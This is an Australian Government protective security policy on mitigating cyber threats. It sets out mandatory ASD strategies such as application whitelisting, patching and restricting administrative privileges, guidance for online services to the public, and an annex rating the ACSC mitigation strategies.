10 Safeguarding information from cyber threats

Purpose

This policy describes how entities can mitigate common and emerging cyber threats. Cyber threats faced by the Australian Government commonly include:

  1. external adversaries who steal data
  2. ransomware that denies access to data, and external adversaries who destroy data and prevent systems from functioning
  3. malicious insiders who steal data
  4. malicious insiders who destroy data and prevent systems from functioning.

The most common cyber threat facing entities is external adversaries who attempt to steal data. Often these adversaries want access to systems and information through email and web pages. It is critical that entities safeguard the information held on systems that can receive emails or browse internet content.

The Australian Signals Directorate's (ASD) Australian Cyber Security Centre (ACSC) provides expert guidance to help entities mitigate cyber threats. While no single mitigation strategy is guaranteed to prevent a cyber security incident, the ACSC estimates many cyber threats could be mitigated by whitelisting applications, patching applications and operating systems, and restricting administrative privileges. These four mandatory strategies form part of the Essential Eight mitigation strategies. The Essential Eight represents the best advice on the measures entity can implement to mitigate cyber threats. Considered the baseline for cyber resilience, entities are strongly recommended to implement the Essential Eight mitigation strategies.

Requirements

Core requirement

Each entity must mitigate common and emerging cyber threats by:

  1. implementing the following Australian Signals Directorate (ASD) Strategies to Mitigate Cyber Security Incidents:
    1. application whitelisting
    2. patching applications
    3. restricting administrative privileges, and
    4. patching operating systems;
  2. considering which of the remaining Strategies to Mitigate Cyber Security Incidents you need to implement to protect your entity. 

Supporting requirements

Supporting requirements help to safeguard information from cyber threats when engaging with members of the public online.

Supporting requirements for safeguarding information from cyber threats

#

Supporting requirements

Requirement 1.

Transacting online with the public

Entities must not expose the public to unnecessary cyber security risks when they transact online with government.

Guidance

When implementing a mitigation strategy, first implement it for workstations of high-risk users and for internet-connected systems before implementing more broadly.

Achieving PSPF maturity with ASD mitigation strategies

Application whitelisting

Malicious code (malware) often aims to exploit security vulnerabilities in existing applications and does not need to be installed on the workstation to be successful. Application whitelisting is effective in addressing instances of malicious code.

Application whitelisting ensures that only authorised applications (eg programs, software libraries, scripts and installers) can be executed. As such, application whitelisting prevents malicious software and unapproved programs from running. Through application whitelisting, an entity can protect its systems by:

  1. identifying authorised applications
  2. developing rules to ensure only authorised applications can execute
  3. maintaining whitelisting rules using a change-management program.

It is important that users and system administrators cannot temporarily or permanently disable, bypass or be exempt from application whitelisting mechanisms (except when conducting authorised administrative activities). This maintains the integrity of application whitelisting as a security treatment.

For further guidance on application whitelisting, see ACSC:

Patching vulnerabilities in applications and operating systems

A patch is a piece of software designed to fix problems or update an application or operating system. This includes fixing security vulnerabilities and other program deficiencies as well as improving the usability or performance of the software.

Applying patches to operating systems, applications, drivers, ICT equipment and mobile devices is a critical activity for systems security:

  1. Patching applications helps to prevent the delivery and execution of malicious code (malware).
  2. Patching operating systems helps to limit the extent of cyber security incidents. For example, applying fixes to known security flaws means systems are protected from compromise. If the operating system is compromised, any action or information handled by that computer is at risk.

Patches for security vulnerabilities come in many forms. These include:

  1. fixes that can be applied to pre-existing application versions
  2. fixes incorporated into new applications or drivers that require replacing pre-existing versions
  3. fixes that require overwriting of the firmware on ICT equipment.

Patches for high assurance ICT equipment (ICT equipment that has been approved for the protection of information classified SECRET or above) is assessed by the ACSC, and where required the ACSC will issue advice on the timeframe in which the patch is to be deployed or amend the Australian Government Information Security Manual.

For guidance on patching applications and systems, see ACSC:

  1. Assessing security vulnerabilities and applying patches – provides guidance on conducting a risk assessment to assess the severity of security vulnerabilities and examples of risk level outcomes (extreme risk, high risk, moderate risk and low risk vulnerabilities)
  2. Australian Government Information Security Manual.

The Attorney-General's Department recommends that entities :

  1. monitor relevant sources for information about new security vulnerabilities and associated patches for operating systems and applications. Patching drives and firmware for ICT equipment is also encouraged
  2. implement a centralised and managed approach to patch operating systems and applications (where possible)
  3. confirm that patches have been installed, applied successfully and remain in place.

Managing application patches can be significantly more challenging than operating system patching. The Attorney-General's Department recommends that entities use the latest release of key business applications as newer applications have better security functionality built it. Applications include:

  1. office productivity suites (eg Microsoft Office)
  2. PDF readers (eg Adobe Reader)
  3. web browsers (eg Microsoft Internet Explorer, Mozilla Firefox or Google Chrome)
  4. common web browser plugins (eg Adobe Flash)
  5. email clients (eg Microsoft outlook)
  6. software platforms (eg Oracle Java Platform and Microsoft .NET Framework).
Unsupported systems and when patches not available

Patches may not be available for older versions of operating systems, especially those no longer supported by vendors. Using unsupported systems exposes entities to security vulnerabilities. New versions of operating systems, applications and hardware often introduce improvements in security functionality over previous versions. This can make it difficult for an adversary to exploit security vulnerabilities they discover.

If there are no patches available from vendors for a security vulnerability, temporary workarounds may provide an effective protection. These workarounds may be published in conjunction with, or soon after, security vulnerability announcements. Temporary workarounds may include disabling the vulnerable functionality within the operating system, application or device or restricting or blocking access to the vulnerable service using firewalls or other access controls. The decision to implement a temporary workaround is risk-based. For guidance on how to manage a security vulnerability when patches are not available, see the system patching guidance in the Australian Government Information Security Manual.

When a patch is not available for a security vulnerability, it is recommended that entities reduce access to the vulnerability through alternative means by:

  1. disabling the functionality associated with the vulnerability
  2. asking the vendor for an alternative method of managing the vulnerability
  3. moving to a different product with a responsive vendor
  4. engaging a software developer to resolve the vulnerability.

If a patch is not available for an application or system that may expose government to high risk, contact ACSC for advice.

Restricting administrative privileges

User accounts with administrative privileges are an attractive target for adversaries because they have a high level of access to the entity's systems. Minimising administrative privileges makes it difficult for an adversary to spread or hide their existence.

Privileged accounts that cannot access emails or open attachments, cannot browse the internet or obtain files via internet services such as instant messaging or social media, minimises opportunities for these accounts to be compromised.

The PSPF policy: Access to information provides guidance on managing access to information systems. These include unique user identification, user authentication and authorisation practices. The Australian Government Information Security Manual provides technical guidance on using multi-factor authentication to assure a privileged account user's identity. Implementing the identified security controls will lower the risk of user accounts being compromised.

For further guidance on administrative privileges, see ACSC:

  1. Restricting administrative privileges
  2. Australian Government Information Security Manual.

The Essential Eight and other strategies to mitigate cyber security incidents

The Attorney-General's Department strongly recommends entities implement the ACSC Essential Eight strategies to mitigate cyber threats. These strategies incorporate the four mitigation strategies mandated by this policy (see section B) as well as four additional strategies that effectively mitigate common and emerging cyber threats. The additional four are:

  1. configuring Microsoft Office macro settings
  2. user application hardening
  3. multi-factor authentication
  4. daily backups.

Entities are encouraged to implement the remaining Strategies to Mitigate Cyber Security Incidents, where relevant to their operational and risk environment. A list of the ACSC strategies is at Annex A.

Cyber security responsibilities when transacting online with the public

Demand for online government services continues to grow, as does the scale, sophistication and perpetration of cybercrime and activities by either malicious or benign actors.

Table 1 provides examples of potential threats to the public when transacting online with government.

 

Table 1 Potential threat sources when transacting online with Australian Government entities
Potential threat sources when transacting online with Australian Government entities

An attacker masquerades as a legitimate entity website to compromise a public user's internet-connected device, steal their identity, or scam them into providing personal details (such as credit card information).

An entity website is compromised and used to host malicious software which subsequently compromises an internet-connected device used by the public when they access the website.

An entity website is compromised and used to redirect the public to another malicious website that subsequently compromises their internet-connected device.

A compromised entity website could result in public username or password details being stolen, and an attacker masquerading as the user to claim government or other financial benefits.

The compromised account details of public users could lead to the compromise of other websites, as public users may use the same details for multiple government online accounts.

The compromise of an internet-connected device used by the public could result in:

  1. their addition to a botnet to participate in illegal activities
  2. theft of details for fraud or identity theft purposes
  3. blackmail of the user (where attackers encrypt hard drives and demand money for a decryption key)
  4. corruption of the internet-connected device and loss of user information.

The Attorney-General's Department recommends entities evaluate the threat scenarios identified in Table 1 and adopt applicable security actions for online services as outlined in Table 2. These activities will avoid exposing the public to cyber security risks when they transact online with government.

 

Table 2 Suggested actions to reduce the risk of harm to the public when transacting online with Australian Government entities

Suggested actions to reduce the risk of harm to the public when transacting online with Australian Government entities

Where online transaction accounts are in use, ensure:

  1. users accept account terms and conditions prior to establishing an account as well as when terms and conditions change
  2. there is a warning that explains (simply):
    1. the specific risks associated with use of the online service
    2. who may, or may not, use the service and under what circumstances
    3. provide details of alternative channels for service or support.
  3. a link to an entity's privacy policy page is provided for further information to public users on the conditions of acceptance
  4. transaction processes that put the user at risk of unnecessary harm are not implemented.

When public users elect to download non-public information from an entity website, ensure:

  1. an appropriate pre-download warning be in place, identifying the potential risk that they are 'about to download information across an unsecured connection'
  2. warning options 'proceed', 'cancel' or '?' are provided
  3. links to additional information on associated risks is provided.

Ensure that Australian Government websites:

  1. contain statements including a 'security notice' and a 'disclaimer notice' (use www.australia.gov.au website as a template for these notices, in consultation with the entity's legal area. For example, advising the public to report suspicious or unauthorised activity related to an online transaction to the responsible entity).

Patches for online services (including maintaining information-only web pages) and web servers be actioned as a priority by the entity's IT support. Delays in patching may create cyber security vulnerabilities for public users:

  1. online transactions that transfer personal details to government require a secure connection (only collect information needed for the delivery of a service)
  2. for entities using social networking services to interact with the public, ensure they:
    1. carefully evaluate privacy and security implications when collecting/retaining personal information as part of a service
    2. monitor social networks for malicious hyperlinks embedded in posts where not directly moderated by the entity before publishing.

Where appropriate and reasonable, entities may offer or impose:

  1. higher level security credentials (eg one-time passwords, digital certificates or tokens) or policy, to help users select a secure password
  2. restrictions or warnings about browser versions known to have security weaknesses, are out of date and/or unsupported
  3. a display of the previous login details at user login (entities implementing a high value or high risk transaction may consider notifying the user of access on their account with details of the Internet Protocol (IP) address)
  4. a message of what personal information an entity will never require users to disclose over email (eg that they would not require users to provide sensitive personal information such as login credentials). Entities may provide advice or links to cyber security and cyber safety information
  5. an alert to users when they are redirected to an external website.

Indications of a security compromise can be detected by:

  1. analysing patterns of online user interactions for unusual activity
  2. fingerprinting user access to detect anomalous access vectors
  3. performing a code audit of web application used on the entity's website to detect security vulnerabilities.

Find out more

Other legislation and policies include:

  1. the Australian Government Information Security Manual
  2. Strategies to Mitigate Cyber Security Incidents
  3.  the Australian Cyber Security Centre (ACSC) publications and advice.

Annex A - ACSC strategies to mitigate cyber incidents 

The Australian Signals Directorate (ASD) has developed prioritised strategies to help mitigate cyber threats, including advice on the suggested implementation order depending on the threats that most concern your entity.  For further guidance see ACSC publications: Strategies to Mitigate Cyber Security Incidents and Strategies to Mitigate Cyber Security Incidents Mitigation Details.

Annex A Table 1 Strategies to mitigate cyber incidents – Mitigation strategies to prevent malware delivery and execution
 

Relative security effectiveness rating

Mitigation strategy

  Essential (mandatory) Application whitelisting of approved/trusted programs to prevent execution of unapproved/malicious programs including .exe, DLL, scripts (eg Windows Script Host, PowerShell and HTA) and installers.
 

Essential (mandatory)

Patch applications eg Flash, web browsers, Microsoft Office, Java and PDF viewers. Patch/mitigate computers with extreme risk vulnerabilities within 48 hours. Use the latest version of applications.

 

Essential
(strongly recommended)

Configure Microsoft Office macro settings to block macros from the internet, and only allow vetted macros either in 'trusted locations' with limited write access or digitally signed with a trusted certificate.

 

Essential
(strongly recommended)

User application hardening. Configure web browsers to block Flash (ideally uninstall it), ads and Java on the internet. Disable unneeded features in Microsoft Office (eg OLE), web browsers and PDF viewers.

 

Excellent

Automated dynamic analysis of email and web content run in a sandbox, blocked if suspicious behaviour is identified (eg network traffic, new or modified files, or other system configuration changes).

 

Excellent

Email content filtering. Whitelist allowed attachment types (including in archives and nested archives). Analyse and sanitise hyperlinks, PDF and Microsoft Office attachments. Quarantine Microsoft Office macros.

 

Excellent

Web content filtering. Whitelist allowed types of web content and websites with good reputation ratings. Block access to malicious domains and IP addresses, ads, anonymity networks and free domains.

 

Excellent

Deny corporate computers direct internet connectivity. Use a gateway firewall to require use of a split DNS server, an email server and an authenticated web proxy server for outbound web connections.

 

Excellent

Operating system generic exploit mitigation eg Data Execution Prevention (DEP), Address Space Layout Randomisation (ASLR) and Enhanced Mitigation Experience Toolkit (EMET).

 

Very good

Server application hardening especially internet accessible web applications (sanitise input and use TLS not SSL) and databases, as well as applications that access important (sensitive or high availability) data.

 

Very good

Operating system hardening (including for network devices) based on a Standard Operating Environment, disabling unneeded functionality (eg RDP, AutoRun, LanMan, SMB/NetBIOS, LLMNR and WPAD).

 

Very good

Antivirus software using heuristics and reputation ratings to check a file's prevalence and digital signature prior to execution. Use antivirus software from different vendors for gateways versus computers.

 

Very good

Control removable storage media and connected devices. Block unapproved CD, DVD and USB storage media. Block connectivity with unapproved smartphones, tablets and Bluetooth, Wi- Fi, 3G and 4G devices.

 

Very good

Block spoofed emails. Use Sender Policy Framework (SPF) or Sender ID to check incoming emails. Use 'hard fail' SPF TXT and DMARC DNS records to mitigate emails that spoof the entity's domain.

 

Good

User education. Avoid phishing emails (eg with links to login to fake websites), weak passphrases, passphrase reuse, as well as unapproved: removable storage media, connected devices and cloud services.

 

Limited

Antivirus software with up-to-date signatures to identify malware, from a vendor that rapidly adds signatures for new malware. Use antivirus software from different vendors for gateways versus computers.

 

Limited

TLS encryption between email servers to help prevent legitimate emails being intercepted and subsequently leveraged for social engineering. Perform content scanning after email traffic is decrypted.

Annex A Table 2 Strategies to Mitigate Cyber Incidents – Mitigation strategies to limit the extent of cyber security incidents
 

Relative security effectiveness rating

Mitigation strategy

 

Essential
(mandatory)

Restrict administrative privileges to operating systems and applications based on user duties. Regularly revalidate the need for privileges. Don't use privileged accounts for reading email and web browsing.

 

Essential
(mandatory)

Patch operating systems. Patch/mitigate computers (including network devices) with extreme risk vulnerabilities within 48 hours. Use the latest operating system version. Do not use unsupported versions.

 

Essential
(strongly recommended)

Multi-factor authentication including for VPNs, RDP, SSH and other remote access, and for all users when they perform a privileged action or access an important (sensitive or high availability) data repository.

 

Excellent

Disable local administrator accounts or assign passphrases that are random and unique for each computer's local administrator account to prevent propagation using shared local administrator credentials.

 

Excellent

Network segmentation. Deny network traffic between computers unless required. Constrain devices with low assurance (eg BYOD and IoT). Restrict access to network drives and data repositories based on user duties.

 

Excellent

Protect authentication credentials. Remove cPassword values (MS14-025). Configure WDigest (KB2871997). Use Credential Guard. Change default passphrases. Require long complex passphrases.

 

Very good

Non-persistent virtualised sandboxed environment. Deny access to important (sensitive or high availability) data, for risky activities (eg web browsing, and viewing untrusted Microsoft Office and PDF files).

 

Very good

Software-based application firewall, blocking incoming network traffic. Block traffic that is malicious or unauthorised, and deny network traffic by default (eg unneeded or unauthorised RDP and SMB/NetBIOS traffic).

 

Very good

Software-based application firewall, blocking outgoing network traffic Block traffic that is not generated by approved or trusted programs, and deny network traffic by default.

 

Very good

Outbound web and email data loss prevention. Block unapproved cloud computing services. Log recipient, size and frequency of outbound emails. Block and log emails with sensitive words or data patterns.

Annex A Table 3 Strategies to Mitigate Cyber Incidents – Mitigation strategies to detect cyber security incidents and respond
 

Relative security effectiveness rating

Mitigation strategy

 

Excellent

Continuous incident detection and response with automated immediate analysis of centralised time-synchronised logs of permitted and denied: computer events, authentication, file access and network activity.

 

Very good

Host-based intrusion detection and prevention system to identify anomalous behaviour during program execution (eg process injection, keystroke logging, driver loading and persistence).

 

Very good

Endpoint detection and response software on all computers to centrally log system behaviour and facilitate incident response. Microsoft's free SysMon tool is an entry-level option.

 

Very good

Hunt to discover incidents based on knowledge of adversary tradecraft. Leverage threat intelligence consisting of analysed threat data with context enabling mitigating action, not just indicators of compromise.

 

Limited

Network-based intrusion detection and prevention system using signatures and heuristics to identify anomalous traffic both internally and crossing network perimeter boundaries.

 

Limited

Capture network traffic to and from corporate computers storing important data or considered as critical assets, and network traffic traversing the network perimeter, to perform incident detection and analysis.

Annex A Table 4 Strategies to Mitigate Cyber Incidents – Mitigation strategies to recover data and system availability
 

Relative security effectiveness rating

Mitigation strategy

 

Excellent

Daily backups of important new or changed data, software and configuration settings, stored disconnected, retained for at least three months. Test restoration initially, annually and when IT infrastructure changes.

 

Very good

Business continuity and disaster recovery plans which are tested, documented and printed in hardcopy with a softcopy stored offline. Focus on the highest priority systems and data to recover.

 

Very good

System recovery capabilities eg virtualisation with snapshot backups, remotely installing operating systems and applications on computers, approved enterprise mobility, and onsite vendor support contracts.

Annex A Table 5 Strategies to Mitigate Cyber Incidents – Mitigation strategy specific to preventing malicious insiders
 

Relative security effectiveness rating

Mitigation strategy

 

Very good

Personnel management eg ongoing vetting especially for users with privileged access, immediately disable all accounts of departing users, and remind users of their security obligations and penalties.